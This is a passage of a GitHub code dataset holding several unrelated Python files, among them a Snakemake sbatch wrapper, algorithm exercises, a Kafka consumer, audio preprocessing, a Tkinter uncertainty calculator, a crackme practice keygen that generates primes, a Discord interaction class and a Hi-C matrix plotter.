rule == 'job_to_bundle':\n print(job_properties)\n if job_properties['wildcards']['wc'] == 'Q':\n params = cluster_json['__default__'] \n else:\n outdir = 'script_temp'\n ec_strings = [f\"{key}={job_properties['wildcards'][key]}\" for key in job_properties['wildcards'] ]\n ec_strings = '-'.join(ec_strings)\n output = f'{ec_strings}.{rule}.sh'\n sp.run(f\"grep -v '#!/bin/sh' {jobscript} > {outdir}/{output}\", shell=True)\n sys.exit()\n \nelse:# use default parameters\n params = cluster_json['__default__'] \n\nsbcmd=f'''sbatch --cpus-per-task={params['cpus-per-task']} \\\n --mem={params['mem']} \\\n --time={params['time']} \\\n --job-name={rule} \\\n --partition={params['partition']} \\\n --output=00log/{rule}.out \\\n --error=00log/{rule}.err \\\n {params['extra']} \\\n {jobscript}\n\n'''\nsp.run(sbcmd, shell=True)\n\n\n","repo_name":"vinay-swamy/Snakemake-Horizontal-RuleGroup","sub_path":"cluster-config.py","file_name":"cluster-config.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42602892030","text":"def solution(jobs):\n cnt = 0\n time = 0\n realtime = 0\n que = []\n x = len(jobs)\n jobs.sort(key=lambda x : x[0])\n\n while cnt < x:\n\n while jobs and jobs[0][0]<=time:\n a, b = jobs.pop(0)\n que.append([a, b])\n que.sort(key = lambda x : x[1])\n if que:\n c, d = que.pop(0)\n time += d\n realtime += time-c\n cnt += 1\n else:\n time += 1\n\n answer = realtime//x\n\n return answer\n\nprint(solution([[0, 3], [1, 9], [2, 6]]\t))","repo_name":"kimss373/solvealgorithm","sub_path":"프로그래머스/디스크 컨트롤러.py","file_name":"디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12904245629","text":"from kafka import KafkaConsumer\nimport json\n\n\nclass ConsumerServer(KafkaConsumer):\n def __init__(self, topic_name):\n self.consumer = KafkaConsumer(\n bootstrap_servers=\"localhost:9092\",\n request_timeout_ms=1000,\n auto_offset_reset=\"earliest\",\n max_poll_records=10\n )\n self.consumer.subscribe(topics=topic_name)\n\n def consume(self):\n while True:\n for metadata, consumer_record in self.consumer.poll().items():\n if consumer_record is not None:\n for record in consumer_record:\n print(json.loads(record.value))\n else:\n print(\"no message\")\n\n\nif __name__ == \"__main__\":\n consumer = ConsumerServer(\"calls\")\n consumer.consume()","repo_name":"amaralunao/SF-Crime-Statistics","sub_path":"consumer_server.py","file_name":"consumer_server.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13466818863","text":"from typing import List\nfrom bisect import bisect_right\nfrom collections import deque\n\n\ndef main():\n def findClosestElements(arr: List[int], k: int, x: int) -> List[int]:\n index = bisect_right(arr, x)\n left, right = index - 1, index\n res = deque()\n for _ in range(k):\n left_val = x - arr[left] if 0 <= left < len(arr) else float('inf')\n right_val = arr[right] - x if 0 <= right < len(arr) else float('inf')\n if left_val <= right_val:\n res.appendleft(arr[left])\n left -= 1\n else:\n res.append(arr[right])\n right += 1\n return list(res)\n\n arr = [1, 2, 3, 4, 5]\n k, x = 4, 3\n print(findClosestElements(arr, k, x))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sanchit-g/DSA-practice-codes","sub_path":"k_closest_elements.py","file_name":"k_closest_elements.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21023241221","text":"import librosa\nimport librosa.display\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport random\n\nmatplotlib.use('Agg')\n\nclass Loader:\n\n def __init__(self, sample_rate, mono): # offset being time_start and duration is the window_size(seconds)\n self.sample_rate = sample_rate\n self.mono = mono\n\n def load(self, file_path, offset, time_end):\n duration = time_end - offset\n signal, sr = librosa.load(file_path, offset=offset, duration=duration, mono=self.mono, res_type=\"kaiser_fast\")\n return signal, sr\n \n def get_sample(self, signal, offset, time_end, original_sample_rate):\n offset_samples = offset * original_sample_rate\n duration_samples = (time_end - offset) * original_sample_rate\n return signal[offset_samples:offset_samples + duration_samples]\n \n def resample(self, signal, original_sr):\n if self.sample_rate != original_sr:\n signal = librosa.resample(signal, original_sr, self.sample_rate, res_type=\"kaiser_best\")\n return signal\n\nclass Padder: #\n def __init__(self, num_expected_samples, mode = \"constant\"):\n self.num_expected_samples = num_expected_samples\n self.mode = mode\n\n def is_padding_needed(self, len_arr):\n return True if self.num_expected_samples > len_arr else False\n\n def pad(self, array): # padding on the end of the original array\n if self.is_padding_needed(len(array)):\n num_missing_samples = self.num_expected_samples - len(array)\n array = np.pad(array, (0, num_missing_samples), mode=self.mode)\n return array\n\n\nclass MelSpecExtractor:\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n\n def extract(self, signal):\n mel_signal = librosa.feature.melspectrogram(y=signal, sr=self.sample_rate)[:-1]\n spectogram = np.abs(mel_signal)\n log_spec = librosa.amplitude_to_db(spectogram, ref = np.max)\n return log_spec\n\nclass MFCCExtractor:\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n\n def extract(self, signal):\n mfccs_features = librosa.feature.mfcc(y=signal, sr=self.sample_rate, n_mfcc=40)\n #in order to find out scaled feature we do mean of transpose of value\n return mfccs_features\n\nclass Saver:\n\n def __init__(self, feature_save_dir):\n self.feature_save_dir = feature_save_dir\n\n def save_feature(self, feature, file_path, offset, time, label,type):\n save_path = self._generate_save_path(file_path, label, offset, time, type)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_yaxis().set_visible(False)\n ax.set_frame_on(False)\n librosa.display.specshow(feature, x_axis=\"time\", y_axis=\"mel\")\n plt.savefig(save_path, bbox_inches='tight', pad_inches = 0)\n plt.clf()\n plt.close(\"all\")\n\n def _generate_save_path(self, file_path, label, offset, time, type):\n ending_str = \"_{}_{}\".format(offset, time)\n file_name = os.path.split(file_path)[1][:-4]\n #save_path = self.feature_save_dir+ type+ label +\"/\" + file_name + ending_str + \"_augmented.png\"\n save_path = file_name + ending_str + \"_augmented.png\"\n return save_path\n\n\n\nclass DataAugmentation:\n\n def __init__(self, sr):\n self.sr = sr\n \n\n def add_white_noise(self, signal, noise_percentage_factor = 0.1):\n noise = np.random.normal(0, signal.std(), signal.size)\n augmented_signal = signal + noise * noise_percentage_factor\n return augmented_signal\n \n def random_gain(self, signal, min_factor=0.1, max_factor=0.12):\n gain_rate = random.uniform(min_factor, max_factor)\n augmented_signal = signal * gain_rate\n return augmented_signal\n \n def time_strecth(self, signal, strech_rate = 0.4):\n return librosa.effects.time_stretch(signal, strech_rate)\n \n def pitch_scale(self, signal, num_semitones = 2):\n return librosa.effects.pitch_shift(signal, self.sr, num_semitones)\n\nclass MinMaxNormaliser:\n\n def __init__(self, min_val, max_val):\n self.min = min_val\n self.max = max_val\n\n def normalise(self, array):\n a = (array - array.min())\n b = (array.max() - array.min())\n norm_array = np.divide(a, b, out=np.zeros_like(a), where=b!=0)\n norm_array = norm_array * (self.max - self.min) + self.min\n return norm_array\n\nclass PreProcessingPipeline:\n\n def __init__(self, loader, padder, feature_extractor, saver, normaliser, data_augmentation):\n self.loader = loader\n self.padder = padder\n self.feature_extractor = feature_extractor\n self.normaliser = normaliser\n self.saver = saver\n self.data_augmentation = data_augmentation\n self.current_file = None\n self.current_signal = None\n self.current_sr = None\n\n def _process_file(self, file_path, offset, time_end,label, type):\n signal,sr = self.loader.load(file_path, offset, time_end)\n signal = self.loader.resample(signal, sr)\n signal = self.padder.pad(signal)\n augmentation = random.randint(0,1)\n feature_orig = self.feature_extractor.extract(signal)\n feature_orig = self.normaliser.normalise(feature_orig)\n feature_pitch = self.feature_extractor.extract(self.data_augmentation.pitch_scale(signal))\n feature_pitch = self.normaliser.normalise(feature_pitch)\n feature_time_streched = self.feature_extractor.extract(self.data_augmentation.time_strecth(signal))\n feature_time_streched = self.normaliser.normalise(feature_time_streched)\n return feature_orig, feature_pitch, feature_time_streched\n # if augmentation == 0:\n # signal = self.data_augmentation.pitch_scale(signal)\n # else:\n # signal = self.data_augmentation.add_white_noise(signal)\n \n # feature = self.feature_extractor.extract(signal)\n # feature = self.normaliser.normalise(feature)\n #feature = feature[..., np.newaxis]\n #self.saver.save_feature(feature, file_path, offset, time_end, label, type)\n\n def process(self, dataframe, type):\n for row in dataframe.itertuples():\n try:\n self._process_file(row.File_path, row.Time_start, row.Time_end, row.Label, type)\n except:\n print(row.File_path, row.Time_start, row.Time_end)\n continue\n\n\nif __name__ == \"__main__\":\n DURATION = 3\n SAMPLE_RATE = 22050\n NUM_EXPECTED_SAMPLES = DURATION * SAMPLE_RATE\n MONO = True\n\n FEATURE_SAVE_DIR = \"mel_augment/\"\n RANDOM_FILE = r\"D:\\Projects\\DL_Violence_Pytorch\\fs\\datasets\\av\\dataset_main\\Hanau02\\i3\\Hanau02_i3_026_center_top_wav_audio_ros.wav\"\n\n \n loader = Loader(SAMPLE_RATE, MONO)\n padder = Padder(NUM_EXPECTED_SAMPLES)\n mel_extractor = MelSpecExtractor(SAMPLE_RATE)\n min_max_normaliser = MinMaxNormaliser(0, 1)\n mfcc_extractor = MFCCExtractor(SAMPLE_RATE)\n saver = Saver(FEATURE_SAVE_DIR)\n data_augmentation = DataAugmentation(SAMPLE_RATE)\n pipeline = PreProcessingPipeline(loader, padder, mel_extractor, saver, min_max_normaliser, data_augmentation)\n #feature = pipeline._process_file(RANDOM_FILE, 52, \"violent\", \"training/\")\n\n","repo_name":"EduardoGit-1/DL-based-algorithm-for-violence-detection-in-audio-data","sub_path":"additional_tests/mel_augment/mel.py","file_name":"mel.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"3699361526","text":"from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.pagesizes import A4\n\n\nstyles = getSampleStyleSheet()\n\nTitle = \"Hello World\"\npageinfo = \"Página\"\n\n\ndef myfirstpage(canvas, doc):\n canvas.saveState()\n canvas.setFont(psfontname=\"Times-Bold\", size=16)\n canvas.drawCentredString(x=3*inch, y=10*inch, text=Title)\n canvas.setFont(psfontname=\"Times-Roman\", size=9)\n canvas.drawString(x=1*inch, y=0.75*inch, text=\"Introdução\")\n canvas.restoreState()\n\n\ndef mylaterpages(canvas, doc):\n canvas.saveState()\n canvas.setFont(psfontname=\"Times-Roman\", size=9)\n canvas.drawString(x=1*inch, y=0.75*inch, text=pageinfo)\n canvas.drawString(x=1.5*inch, y=0.75*inch, text=str(canvas.getPageNumber()))\n canvas.restoreState()\n\n\ndef go():\n doc = SimpleDocTemplate(filename=\"platypus_intro.pdf\", pagesize=A4, title=\"Lista\")\n story = [Spacer(1, 2*inch)]\n style = styles[\"Normal\"]\n for i in range(20):\n bogustext = (\"This is Paragraph number %s \" % i) * 10\n paragrafo = Paragraph(bogustext, style)\n story.append(paragrafo)\n story.append(Spacer(width=1, height=0.2*inch))\n\n doc.build(flowables=story, onFirstPage=myfirstpage, onLaterPages=mylaterpages)\n\n return doc\n\n\nif __name__ == '__main__':\n go()\n","repo_name":"jeancharlles/reportpdf","sub_path":"platypus/platypus_intro.py","file_name":"platypus_intro.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18239540447","text":"#!/usr/bin/python\n#standard imports\nimport sys\n\nk = int(sys.argv[1]) #read first input as k size of kmers\nwith open(sys.argv[2]) as f: #read input file, remove new line character and concatenate lines\n file = \"\".join(line.strip() for line in f.readlines()[1:])\nkmers, bases = list(), tuple(list('ATGC'))\ndef generate_kmers(dna_tup: tuple, kmers: list, k: int)-> dict:\n \"\"\" method to generate all possible combinations of kmers from dna bases\n :param dna_tup: tuple of dna bases\n :param kmers: a list containing combinations\n :param k: k-mer size from user input\n :return: k-mer combinations dictionary\n \"\"\"\n while k:\n kmers = [i + list(j) for i in kmers for j in dna_tup]\n return generate_kmers(dna_tup=dna_tup, kmers=kmers, k=k-1)\n return dict.fromkeys([''.join(x) for x in kmers],0)\nkmer_dict = generate_kmers(dna_tup=bases, kmers=[kmers], k=k) #create dictionary with kmers as keys\nfor key in kmer_dict.keys(): #to find number of occurrences of kmers in fasta read file, insert as values to dict\n if key in file: kmer_dict[key] = sum([1 for i in range(0,len(file)-len(key)+1) if file[i:i+len(key)] == key ])\n[print(key,'\\t',kmer_dict[key]) for key in sorted(kmer_dict.keys()) if kmer_dict[key]][0] #print stdout","repo_name":"rbr7/bioinformatics_courses","sub_path":"prog_bioinformatics/solved_bioinfo_algos/kmer_counter.py","file_name":"kmer_counter.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71744951150","text":"from math import sqrt\r\nfrom sympy import *\r\nfrom tkinter import Tk, Label, Button, Entry, Frame\r\n\r\nclass Uncert_Calc:\r\n def __init__(self, master):\r\n self.master = master\r\n master.title('Uncertainty Propagation Calc')\r\n master.iconbitmap('favicon.ico')\r\n\r\n self.frame = Frame()\r\n self.frame.grid(padx=20, pady=20)\r\n\r\n #instantiate widgets\r\n self.formula_label = Label(self.frame, text='Enter Formula: ')\r\n self.formula_entry = Entry(self.frame)\r\n self.submit_formula = Button(self.frame, text='Continue', command=self.generateEntries)\r\n \r\n self.answer_label = Label(self.frame, text='')\r\n\r\n #show widgets\r\n self.formula_label.grid(row=0)\r\n self.formula_entry.grid(row=0, column=1)\r\n self.submit_formula.grid(row=0, column=2, padx=10)\r\n\r\n self.variables = [] #symbols in function\r\n self.values = [] #values of the symbols\r\n self.uncertainties = [] #uncertainties of those values\r\n self.subsitutions = [] #for subs() sympy function\r\n self.entries = [] #generated entries\r\n #special functions\r\n self.special_2 = ('ln')\r\n self.special_3 = ('cos','sin','tan','sec','csc','cot','log')\r\n self.special_4 = ('acos','asin','atan','asec','acsc','acot')\r\n\r\n def generateEntries(self):\r\n #clear any existing entries, and the rest of the lists\r\n del self.entries[:]\r\n del self.variables[:]\r\n del self.values[:]\r\n del self.uncertainties[:]\r\n del self.subsitutions[:]\r\n \r\n for widget in self.frame.grid_slaves(): #grid_slaves() returns all widgets in grid\r\n if int(widget.grid_info()['row']) > 0:\r\n widget.grid_forget()\r\n\r\n #get formula\r\n funct = self.formula_entry.get()\r\n i = 0\r\n while i < len(funct): #determine variables in function\r\n if funct[i:i+2] in self.special_2:\r\n i+=2\r\n elif funct[i:i+3] in self.special_3:\r\n i+=3\r\n elif funct[i:i+4] in self.special_4:\r\n i+=4\r\n if funct[i].isalpha() and funct[i] not in self.variables:\r\n self.variables.append(funct[i])\r\n i+=1\r\n \r\n #create entries\r\n i=1 #row number\r\n for variable in self.variables: #set variables as symbols in sympy, create values and uncertanties list\r\n var(variable)\r\n Label(self.frame, text=\"Enter the value and uncertainty for '\" + variable +\"': '\").grid(row=i)\r\n entry = Entry(self.frame)\r\n entry.grid(row=i, column=1)\r\n self.entries.append(entry)\r\n i+=1\r\n \r\n #submit button and view answer\r\n submit = Button(self.frame,text='Submit',command=lambda: self.calcUncert(funct))\r\n submit.grid(row=i,padx=10,pady=10)\r\n\r\n def calcUncert(self,f):\r\n funct = f\r\n sumR = 0\r\n \r\n del self.uncertainties[:]\r\n del self.values[:]\r\n \r\n for entry in self.entries:\r\n val_uncert=entry.get().split()\r\n self.values.append(float(val_uncert[0]))\r\n self.uncertainties.append(float(val_uncert[1]))\r\n\r\n for j in range(len(self.variables)): #create subsitutions list\r\n self.subsitutions.append((self.variables[j], self.values[j]))\r\n for i in range(0,len(self.values)): #calculate propogated uncertainty\r\n sumR += (diff(funct, self.variables[i]).subs(self.subsitutions) * self.uncertainties[i])**2\r\n result = sympify(funct).subs(self.subsitutions)\r\n self.answer_label['text'] = 'Answer: ' + str(round(result,3)) + ' +/- ' + str(round(sqrt(sumR),3))\r\n self.answer_label.grid(row=self.frame.grid_size()[1]-1, column=1)\r\n\r\n#run gui \r\nroot = Tk()\r\ngui = Uncert_Calc(root)\r\nroot.mainloop()\r\n","repo_name":"igullickson/PyUncertaintyCalc","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22496799005","text":"import random\n\ndef keygen():\n key_list = []\n while True:\n #Try to get a good mix of short and long numbers for variety.\n mix = random.randint(1,100)\n if mix % 2 == 0:\n n = random.randint(100,1000)\n else:\n n = random.randint(100000,900000)\n \n isPrime = True\n\n #Check to see if any other number will divide evenly.\n for num in range(2, n):\n if n % num == 0:\n isPrime = False\n break\n\n #Check to see if its prime and length modulo 3 equals 0. \n if isPrime and (len(str(n)) % 3 == 0):\n key_list.append(n)\n\n #Just generate 10 of these.\n if len(key_list) == 10:\n break\n return key_list\n\nkey_list = keygen()\n\nprint('Generated Keys (10): ')\n\nfor p in key_list:\n print(p)\n","repo_name":"xd43D41U5x/CrackMe_Challenges","sub_path":"week_6/keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6280368196","text":"# exercise 2: calculate body mass index\nweight = input(\"enter your weight in kg: \")\nheight = input(\"enter your height in m: \")\n\nfbmi = float(weight) / (float(height) ** 2)\nibmi = round(fbmi, 2)\n\nprint(f\"Your BMI is {ibmi} \")\n\nif ibmi <= 18.5:\n print(\"Your are UNDERWEIGHT.\")\nelif ibmi <= 25:\n print(\"You are NORMAL WEIGHT.\")\nelif ibmi <= 30:\n print(\"You are OVERWEIGHT.\")\nelif ibmi <= 35:\n print(\"You are OBESED.\")\nelse:\n print(\"You are CLINICALLY OBESED.\")","repo_name":"tasha-olivia/pythonCourse","sub_path":"python 100/day 2/exercise2_bmi.py","file_name":"exercise2_bmi.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"690994641","text":"from typing import Union\n\nfrom classes.response import InteractionResponse, InteractionCallbackData, InteractionCallbackType, InteractionCallbackDataFlags\n\nfrom classes.member import Member\nfrom classes.user import User\n\nfrom classes.components import ActionRow, Button, SelectMenu\n\n\nclass Context:\n def __init__(self, interaction_type, http, interaction):\n self._acked = False\n\n self.type = interaction_type\n\n self.http = http\n self.interaction = interaction\n self.interaction_id = int(interaction['id'])\n self.application_id = int(interaction['application_id'])\n self.interaction_token = interaction['token']\n\n @property\n def guild_id(self) -> int:\n return int(self.interaction['guild_id']) if 'guild_id' in self.interaction else None\n\n @property\n def channel_id(self) -> int:\n return int(self.interaction['channel_id']) if 'channel_id' in self.interaction else None\n\n @property\n def author(self) -> Union[Member, User]:\n return Member(self.interaction['member']) if 'member' in self.interaction else User(self.interaction['user'])\n\n @property\n def message(self) -> dict:\n return self.interaction['message'] if 'message' in self.interaction else None\n\n async def respond(self, content=None, embeds=None, ephemeral=False, components=None):\n if ephemeral:\n ephemeral = InteractionCallbackDataFlags.EPHEMERAL.value\n else:\n ephemeral = 0\n if components:\n if isinstance(components, ActionRow):\n components = [components.to_json()]\n elif isinstance(components, Button) or isinstance(components, SelectMenu):\n row = ActionRow()\n row.add_components(components)\n components = [row]\n else:\n rows = []\n row = ActionRow()\n for i, component in enumerate(components):\n if i % 5 == 0 and i != 0:\n rows.append(row)\n row = ActionRow()\n row.add_components(component)\n components = rows\n data = InteractionCallbackData(content=content, embeds=embeds, flags=ephemeral, components=components)\n if self.type == 2:\n if not self._acked:\n return InteractionResponse(InteractionCallbackType.CHANNEL_MESSAGE_WITH_SOURCE, data)\n else:\n await self.http.request('POST', f'/webhooks/{self.application_id}/{self.interaction_token}', json=data)\n elif self.type == 3:\n if not self._acked:\n return InteractionResponse(InteractionCallbackType.UPDATE_MESSAGE, data)\n else:\n await self.http.request('PATCH', f'/webhooks/{self.application_id}/{self.interaction_token}/messages/@original', json=data.to_json())\n","repo_name":"random-duk/ducky-interactions","sub_path":"classes/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34526349885","text":"import sys\r\n\r\nN,K=map(int,sys.stdin.readline().split())\r\n\r\ninputs=sys.stdin.readline().strip()\r\n\r\narr=[]\r\n\r\nfor ch in inputs:\r\n if ch == 'H':\r\n arr.append(False)\r\n else:\r\n arr.append(True)\r\n# print(inputs)\r\n# print(arr)\r\n\r\ncnt=0\r\nfor i in range(len(inputs)):\r\n if inputs[i]=='H':\r\n for idx in range(max(i-K,0),min(i+K+1,len(inputs))):\r\n if arr[idx]==True:\r\n arr[idx]=False\r\n cnt+=1\r\n break\r\n\r\n\r\nprint(cnt)\r\n","repo_name":"hyun132/Algorithm_with_python","sub_path":"햄버거 분배.py","file_name":"햄버거 분배.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22779550448","text":"import matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\nfrom mpl_toolkits.axes_grid1.colorbar import colorbar\n\nimport numpy as np\nfrom scipy import ndimage\n\nfrom coolbox.utilities import (\n GenomeRange,\n change_chrom_names,\n get_logger\n)\n\nfrom coolbox.plots.track.base import TrackPlot\n\n\nlog = get_logger(__name__)\n\n\nSTYLE_TRIANGULAR = 'triangular'\nSTYLE_MATRIX = 'matrix'\nSTYLE_WINDOW = 'window'\n\nDEPTH_FULL = 'full'\n\n\nclass PlotHiCMatrix(TrackPlot):\n\n DEFAULT_COLOR = 'YlOrRd'\n\n def __init__(self, *args, **kwargs):\n TrackPlot.__init__(self, *args, **kwargs)\n\n self.__set_default_properties()\n\n self.small_value = 1e-12\n self.ax = None\n self.label_ax = None\n self.matrix = None\n self._out_of_bound = False\n\n from coolbox.utilities.hic.tools import file_type\n self.file_type = file_type(self.properties['file'])\n\n self.fetched_binsize = None\n\n def __set_default_properties(self):\n self.properties['height'] = 'hic_auto'\n\n if 'color' not in self.properties:\n self.properties['color'] = self.DEFAULT_COLOR\n if 'style' not in self.properties:\n self.properties['style'] = STYLE_TRIANGULAR\n if 'balance' not in self.properties:\n self.properties['balance'] = 'no'\n if 'color_bar' not in self.properties:\n self.properties['color_bar'] = 'yes'\n if 'transform' not in self.properties:\n self.properties['transform'] = 'no'\n if 'title' not in self.properties:\n self.properties['title'] = ''\n if 'depth_ratio' not in self.properties:\n self.properties['depth_ratio'] = DEPTH_FULL\n if 'norm' not in self.properties:\n self.properties['norm'] = 'log'\n\n @property\n def is_inverted(self):\n if 'orientation' in self.properties and self.properties['orientation'] == 'inverted':\n return True\n else:\n # default: not inverted\n return False\n\n @property\n def style(self):\n if 'style' in self.properties:\n return self.properties['style']\n else:\n # default triangular style\n return STYLE_TRIANGULAR\n\n @property\n def balance(self):\n if self.properties['balance'] == 'no':\n return False\n else:\n if self.file_type == '.hic':\n if self.properties['balance'] == 'yes':\n return 'KR' # default use KR balance\n else:\n return self.properties['balance']\n else:\n return True\n\n @property\n def is_balance(self):\n return bool(self.balance)\n\n def __transform_matrix(self, arr):\n if self.properties['transform'] == 'log10':\n arr = np.log10(arr)\n elif self.properties['transform'] == 'log2':\n arr = np.log2(arr)\n elif self.properties['transform'] == 'log':\n arr = np.log(arr)\n return arr\n\n @property\n def matrix_val_range(self):\n small = 1e-4\n arr = self.matrix\n arr_no_nan = arr[np.logical_not(np.isnan(arr))]\n\n if self.properties['min_value'] == 'auto':\n # set minimal value for color bar\n min_ = arr[arr > arr.min()].min()\n else:\n min_ = self.properties['min_value']\n\n if self.properties['max_value'] == 'auto':\n max_ = arr_no_nan.max()\n else:\n max_ = self.properties['max_value']\n\n if max_ <= min_:\n max_ = min_ + small\n\n return min_, max_\n\n def __fetch_matrix(self, genome_range, resolution='auto'):\n \"\"\"\n Fetch the matrix.\n\n Parameters\n ----------\n genome_range : coolbox.utilities.GenomeRange\n The genome range to fetch.\n\n resolution : {'auto', int}\n The matrix resolution, for multi-resolution(.hic or multi-cool) file.\n Use 'auto' to infer the resolution automatically.\n default 'auto'\n \"\"\"\n from coolbox.utilities.hic.wrap import StrawWrap, CoolerWrap\n\n path = self.properties['file']\n if self.file_type == '.hic':\n wrap = StrawWrap(path, normalization=self.balance, binsize=resolution)\n else:\n wrap = CoolerWrap(path, balance=self.balance, binsize=resolution)\n\n arr = wrap.fetch(genome_range)\n\n self.fetched_binsize = wrap.fetched_binsize # expose fetched binsize\n\n # fill zero and nan with small value\n small = self.small_value\n arr[arr == 0] = small\n arr[np.isnan(arr)] = small\n\n if 'transform' in self.properties and self.properties['transform'] != 'no':\n arr = self.__transform_matrix(arr)\n\n return arr\n\n def __get_triangular_matrix(self, arr):\n small = self.small_value\n tri_matrix = ndimage.rotate(arr, 45, prefilter=False, cval=small)\n\n rows = tri_matrix.shape[0]\n\n tri_matrix = tri_matrix[0:(rows//2 + 1), :]\n\n # cut depth\n if self.properties['depth_ratio'] != 'auto' and self.properties['depth_ratio'] != DEPTH_FULL:\n depth_ratio = float(self.properties['depth_ratio'])\n depth = int(tri_matrix.shape[0] * depth_ratio)\n tri_matrix = tri_matrix[-depth:, :]\n\n return tri_matrix\n\n def __get_window_matrix(self, arr):\n small = self.small_value\n window_matrix = ndimage.rotate(arr, 45, prefilter=False, cval=small)\n rows, cols = window_matrix.shape\n if self._out_of_bound == 'left':\n # left side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :(2*x+1)]\n elif self._out_of_bound == 'right':\n # right side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :(2*x+1)]\n elif self._out_of_bound == 'both':\n # double side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :]\n else:\n # normal\n x = cols // 4\n window_matrix = window_matrix[(rows//4):(rows//2 + 1), x:(3*x + 1)]\n\n # cut depth\n if self.properties['depth_ratio'] != 'auto' and self.properties['depth_ratio'] != DEPTH_FULL:\n depth_ratio = float(self.properties['depth_ratio'])\n depth = int(window_matrix.shape[0] * depth_ratio)\n window_matrix = window_matrix[-depth:, :]\n\n return window_matrix\n\n def __plot_matrix(self, genome_range):\n start, end = genome_range.start, genome_range.end\n ax = self.ax\n arr = self.matrix\n cmap = plt.get_cmap(self.properties['color'])\n cmap.set_bad(\"white\")\n cmap.set_under(\"white\")\n c_min, c_max = self.matrix_val_range\n\n depth_ratio = 1.0 if self.properties['depth_ratio'] == DEPTH_FULL else self.properties['depth_ratio']\n\n if self.style == STYLE_TRIANGULAR:\n # triangular style\n tri_matrix = self.__get_triangular_matrix(arr)\n img = ax.matshow(tri_matrix, cmap=cmap,\n extent=(start, end, 0, depth_ratio * (end - start)/2),\n aspect='auto')\n elif self.style == STYLE_WINDOW:\n # window style\n window_matrix = self.__get_window_matrix(arr)\n img = ax.matshow(window_matrix, cmap=cmap,\n extent=(start, end, 0, depth_ratio * (end - start)/2),\n aspect='auto')\n else:\n # matrix style\n img = ax.matshow(arr, cmap=cmap,\n extent=(start, end, end, start),\n aspect='auto')\n\n if self.properties['norm'] == 'log':\n img.set_norm(colors.LogNorm(vmin=c_min, vmax=c_max))\n else:\n img.set_norm(colors.Normalize(vmin=c_min, vmax=c_max))\n\n return img\n\n def __adjust_figure(self, genome_range):\n ax = self.ax\n start, end = genome_range.start, genome_range.end\n if self.style == STYLE_TRIANGULAR or self.style == STYLE_WINDOW:\n\n if self.properties['depth_ratio'] == DEPTH_FULL:\n depth = genome_range.length / 2\n else:\n depth = (genome_range.length / 2) * self.properties['depth_ratio']\n\n if self.is_inverted:\n ax.set_ylim(depth, 0)\n else:\n ax.set_ylim(0, depth)\n else:\n ax.set_ylim(end, start)\n ax.set_xlim(start, end)\n\n def __plot_colorbar(self, img, orientation='vertical'):\n if orientation == 'horizontal':\n ax_divider = make_axes_locatable(self.ax)\n if self.is_inverted:\n cax = ax_divider.append_axes(\"top\", size=0.09, pad=0.2)\n else:\n cax = ax_divider.append_axes(\"bottom\", size=0.09, pad=0.2)\n colorbar(img, cax=cax, orientation='horizontal')\n else: # vertical\n y_ax = self.y_ax\n\n if self.properties['norm'] == 'log':\n from matplotlib.ticker import LogFormatter\n formatter = LogFormatter(10, labelOnlyBase=False)\n aa = np.array([1, 2, 5])\n c_min, c_max = self.matrix_val_range\n\n def abs_inc(num):\n if num != 0:\n sign = num / abs(num)\n return int(sign * abs(num + 1))\n else:\n return 1\n\n lower_ = int(np.log10(c_min))\n upper_ = abs_inc(int(np.log10(c_max)))\n tick_values = np.concatenate([aa * 10 ** x for x in range(lower_, upper_)])\n\n c_bar = plt.colorbar(img, ax=y_ax, ticks=tick_values, format=formatter, fraction=0.98)\n else:\n c_bar = plt.colorbar(img, ax=y_ax, fraction=0.98)\n\n c_bar.solids.set_edgecolor(\"face\")\n c_bar.ax.tick_params(labelsize='smaller')\n\n c_bar.ax.yaxis.set_ticks_position('left')\n\n def __fetch_window_matrix(self, genome_range):\n from copy import copy\n fetch_range = copy(genome_range)\n x = (genome_range.end - genome_range.start) // 2\n fetch_range.start = genome_range.start - x\n fetch_range.end = genome_range.end 